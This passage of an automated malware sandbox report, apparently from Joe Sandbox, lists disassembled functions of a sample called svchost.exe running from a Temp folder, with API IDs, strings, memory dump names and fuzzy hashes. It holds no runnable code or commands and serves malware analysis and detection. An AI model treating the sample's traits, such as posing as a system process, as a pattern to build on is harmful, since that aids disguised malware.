                                      • Opcode Fuzzy Hash: 0a0207b346ff271583a7a69f16d53c83212332797eaa9f7e9bab84b6fcdc6a15
                                      • Instruction Fuzzy Hash: 362181B2A1A649C7FB508F24E4543BE32F2FB94709F248034CE098E699DF7E5555C780
                                      Function 00007FF669AC7E84 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CapsDeviceRelease
                                      • String ID:
                                      • API String ID: 127614599-3916222277
                                      • Opcode ID: ae83a8f94213b0459197ba9ee33cd9b326388b6252376cff48c54208c8ddbc67
                                      • Instruction ID: 910742750bf5c6be45526cc9a63bf7922329f97e97ce43901f79a15abf1bfbe6
                                      • Opcode Fuzzy Hash: ae83a8f94213b0459197ba9ee33cd9b326388b6252376cff48c54208c8ddbc67
                                      • Instruction Fuzzy Hash: ECE0C220B08646C2EB085BB6B68A53F2271AB4CBD0F154434EE0F8B7A4DD3CC4D04340
                                      Function 00007FF669ABFB64 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      • Opcode ID: 8a5c7c6a39344ee5071631a8ac11e452677af9df8fecda107b1b4b634b64fc02
                                      • Instruction ID: 48a31112618139a1620672bb5731a1616bfe3a1cba7c7cc93a6948406a5a09fd
                                      • Opcode Fuzzy Hash: 8a5c7c6a39344ee5071631a8ac11e452677af9df8fecda107b1b4b634b64fc02
                                      • Instruction Fuzzy Hash: 68519166F14A46D5EB00AF75D4412FC33B1EB89B98F404636DE1C9B79ADF28E645C340
                                      Function 00007FF669AB2D24 Relevance: 6.1, APIs: 4, Instructions: 106fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3823481717-0
                                      • Opcode ID: ad576a7fd675d735d767043b7eb9e4fe7ff89bed50088d05c45d8c5bbd9b662c
                                      • Instruction ID: bc7b1b7f01d1d892d27227f789e499ec2f7153d2ff088223b630e7bcd9030d0b
                                      • Opcode Fuzzy Hash: ad576a7fd675d735d767043b7eb9e4fe7ff89bed50088d05c45d8c5bbd9b662c
                                      • Instruction Fuzzy Hash: B241AF62F14B96C5FB008F69D8452BD33B2FF58798F105236DE5CAAA99DF38D446C240
                                      Function 00007FF669ADCA9C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 4141327611-0
                                      • Opcode ID: cc2b5f72e04f255bdd161a01facf61ca1cd77773b0508fa3a6c5440d086eda3c
                                      • Instruction ID: 11579b749ce3d3361bf3351417b0f18aaaa92d04bb1ee0660e0618b476c79359
                                      • Opcode Fuzzy Hash: cc2b5f72e04f255bdd161a01facf61ca1cd77773b0508fa3a6c5440d086eda3c
                                      • Instruction Fuzzy Hash: 72414F22A0D682C6FF659F14E144379B6F1EF40B94F948131DE9D8EBD5DF2CD8498600
                                      Function 00007FF669ADFAB8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFAD1
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFB33
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFB6D
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF669ADB39B), ref: 00007FF669ADFB97
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 1557788787-0
                                      • Opcode ID: 8289a7f455f1c13ab6c525b9847fb09ae3726bbd47523eec50ffed44d61e5ab7
                                      • Instruction ID: 7c03595a55cab30001999bacba2106e6fcb1db9c65250f86f6e9f6f817488dc2
                                      • Opcode Fuzzy Hash: 8289a7f455f1c13ab6c525b9847fb09ae3726bbd47523eec50ffed44d61e5ab7
                                      • Instruction Fuzzy Hash: 4D21A721F18791C5E7209F12641402A7AF4FF98BD0B084138DE9EABB94DF3CD4559340
                                      Function 00007FF669AA2F50 Relevance: 6.1, APIs: 4, Instructions: 68filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFileLast$ConnectNamedObjectOverlappedPipeReadResultSingleWaitWrite
                                      • String ID:
                                      • API String ID: 1643396940-0
                                      • Opcode ID: 87c0965e002af64279ee4d5d2dd98da1740ecd3901f5709c99e998647e30e0e3
                                      • Instruction ID: a6a5fac4a1c6d4fb9a1c207f8741d130db2d29cb916c301f2ac6b2e76aba3d7d
                                      • Opcode Fuzzy Hash: 87c0965e002af64279ee4d5d2dd98da1740ecd3901f5709c99e998647e30e0e3
                                      • Instruction Fuzzy Hash: 3D214821618A82C2EA60DF56E5503BE73B0FB85BC4F008036DF8D8BB95DF2DE5168300
                                      Function 00007FF669ADC380 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast$abort
                                      • String ID:
                                      • API String ID: 1447195878-0
                                      • Opcode ID: e0db62ad708a49bacc26d6d5500a046c5e183a3b42353b83d554186b314d3a26
                                      • Instruction ID: a3f28f1402d4b6bda1b9ae1aebb68b0c37c16a97ce0c3781c6bf513ab0c40600
                                      • Opcode Fuzzy Hash: e0db62ad708a49bacc26d6d5500a046c5e183a3b42353b83d554186b314d3a26
                                      • Instruction Fuzzy Hash: E6012920A09642C2FE586F65A65617C71F25F48790F540638DD1E8E7D6EE2CE8098600
                                      Function 00007FF669AD2DFC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      • Opcode ID: 3945a147f3b25ceeceee1bf2474738a8e00b257c2cd676a8bb847f7879c95be7
                                      • Instruction ID: a7c48fa827c214ec6f2fff19a0b58d99d47fabcdcf742f22662fa4b480ae8ad4
                                      • Opcode Fuzzy Hash: 3945a147f3b25ceeceee1bf2474738a8e00b257c2cd676a8bb847f7879c95be7
                                      • Instruction Fuzzy Hash: 1C112E22B14F06C9EB00CF64E8542B833B4FB59758F440E31DE6D8A7A4DF78D1548340
                                      Function 00007FF669AAD7A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: DXGIDebug.dll
                                      • API String ID: 3668304517-540382549
                                      • Opcode ID: 072a2d60a1bac273585e737dd96dc3e7ebe835d058b64cfe1808f8ff69c016b7
                                      • Instruction ID: 460ed331ffe10c748440faef9923cd454d0a5939f11c588f6d2b81cabd495e62
                                      • Opcode Fuzzy Hash: 072a2d60a1bac273585e737dd96dc3e7ebe835d058b64cfe1808f8ff69c016b7
                                      • Instruction Fuzzy Hash: FA818962A14B81C6EB14CF25E4403AD73B5FB58798F104226DFAC4BB9ADF78E1A1C344
                                      Function 00007FF669ADD134 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: e+000$gfff
                                      • API String ID: 3215553584-3030954782
                                      • Opcode ID: 19e829a92e30a2b3cdb90c62c312ed3148f49dc115d44ccaf45b2f71adb74fc9
                                      • Instruction ID: 7f78df4c1060f9b0f6327e36d86a183974e339f49549193ddbbc6f0ca461006e
                                      • Opcode Fuzzy Hash: 19e829a92e30a2b3cdb90c62c312ed3148f49dc115d44ccaf45b2f71adb74fc9
                                      • Instruction Fuzzy Hash: BE51C562B187C186E7658F3999413697BE1EB41B90F089236DE9CCBBD5DE2CE448CB00
                                      Function 00007FF669AB8638 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                      • String ID: SIZE
                                      • API String ID: 449872665-3243624926
                                      • Opcode ID: dd89114f3cbe9092230c5111aaea5a286881aa95f04e162dcd51c5514f6751be
                                      • Instruction ID: aceb29d725235bae8d45a2bb9dc7645a5161afcba0208aee9e2efc471a367f54
                                      • Opcode Fuzzy Hash: dd89114f3cbe9092230c5111aaea5a286881aa95f04e162dcd51c5514f6751be
                                      • Instruction Fuzzy Hash: 53417363A18687D6EA50DF2CD4413BD73B1AF95798F005231EE9C8A6DAEE3DE584C700
                                      Function 00007FF669AC93D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemTextWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 2478532303-3402441367
                                      • Opcode ID: 352da8d211e1297bb4721be3a9a9c5509567891ca3466e1e86c97c02282189db
                                      • Instruction ID: 99839b60c1dcfdff0e19211da08434132aa59e4a567c370d8c6ab7dd92ad5e42
                                      • Opcode Fuzzy Hash: 352da8d211e1297bb4721be3a9a9c5509567891ca3466e1e86c97c02282189db
                                      • Instruction Fuzzy Hash: 60418F22A0CA46D1FB149F16E6902BD77F0AB8ABC4F540036DE4D9F7A5DE7EE8458340
                                      Function 00007FF669ADB200 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                      • String ID: C:\Users\user\AppData\Local\Temp\svchost.exe
                                      • API String ID: 3307058713-107691469
                                      • Opcode ID: fd6bb0cba2b6de515d3f4460842bfbe27bd04de603ce11559c1b296caa94cb00
                                      • Instruction ID: 661d21d73d450a67f3a414ceca51137d766b8bd23c0272072c3fd2ea8d4b3b59
                                      • Opcode Fuzzy Hash: fd6bb0cba2b6de515d3f4460842bfbe27bd04de603ce11559c1b296caa94cb00
                                      • Instruction Fuzzy Hash: 5841BB32A08A52CAEB14DF25A8401BD37F4FF4AB94B884136ED4D8BB95CF3DE4498340
                                      Function 00007FF669ACEAB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemTextWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 2478532303-3299779563
                                      • Opcode ID: 07a1918b5adf74bf8326971d99c19d8356f0f093a3c121c6252ceaf2ff1e65a3
                                      • Instruction ID: 73efcc651982c0701e861175ed5e3dcb0865eadf0285f2404615e69ab657a306
                                      • Opcode Fuzzy Hash: 07a1918b5adf74bf8326971d99c19d8356f0f093a3c121c6252ceaf2ff1e65a3
                                      • Instruction Fuzzy Hash: A731A022B0D642C2FB109F22A99527D76F1AF4ABC0F604034DD4E9F796DE3DAC528340
                                      Function 00007FF669AB8870 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_snwprintf
                                      • String ID: $%s$@%s
                                      • API String ID: 2650857296-834177443
                                      • Opcode ID: 19a337833a75e45572a7a455d820ae29326b78e63e5ab7a0c63d50e7cb766430
                                      • Instruction ID: c634f32e762035ff0f44e50af0058c39cd504421c46531068d2044f8357cae48
                                      • Opcode Fuzzy Hash: 19a337833a75e45572a7a455d820ae29326b78e63e5ab7a0c63d50e7cb766430
                                      • Instruction Fuzzy Hash: 3C317AB2A18A8BD5EE109F69E4402A977F0FB85788F405032EE4D9B799DE3CE506C700
                                      Function 00007FF669AC962C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryFreeLocal
                                      • String ID: D
                                      • API String ID: 2937684288-2746444292
                                      • Opcode ID: 5d31b65563ac5e067310488a49cf5d1b230e3c89655a44667b860c3d3b71386e
                                      • Instruction ID: 6a97d5618b990141e1b993d405e1c28015abffb578b64d121b32d0fefe3bb8a7
                                      • Opcode Fuzzy Hash: 5d31b65563ac5e067310488a49cf5d1b230e3c89655a44667b860c3d3b71386e
                                      • Instruction Fuzzy Hash: E2312732A08A46DAFB10CFA0E4417ED33B5AB8874CF440135DE4D9AA88EF78D548C780
                                      Function 00007FF669ADDA44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID: @
                                      • API String ID: 3000768030-2766056989
                                      • Opcode ID: 585fd126a3be45f12eafecb30455c0ff3a8c8d5a534fdec7c03e9fbb5118d838
                                      • Instruction ID: f36493d5d1420edc535e36de99beab7ba473b6acaf55ab9aa195db342f0b641c
                                      • Opcode Fuzzy Hash: 585fd126a3be45f12eafecb30455c0ff3a8c8d5a534fdec7c03e9fbb5118d838
                                      • Instruction Fuzzy Hash: 7E218622A0C682C1FB608F24949413936B5EB45774F295336DE6E8FBE8CE39D886D741
                                      Function 00007FF669AD3040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF669AD17B2), ref: 00007FF669AD3090
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF669AD17B2), ref: 00007FF669AD30D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      • Opcode ID: 67b099dddac297130c8f9168dfb77b0e864154b40f0cb5a13d621eb8285644c7
                                      • Instruction ID: bcc45f25313af813bad533bf18e09cdaa62d3a49c15caed4e12629be6df135a4
                                      • Opcode Fuzzy Hash: 67b099dddac297130c8f9168dfb77b0e864154b40f0cb5a13d621eb8285644c7
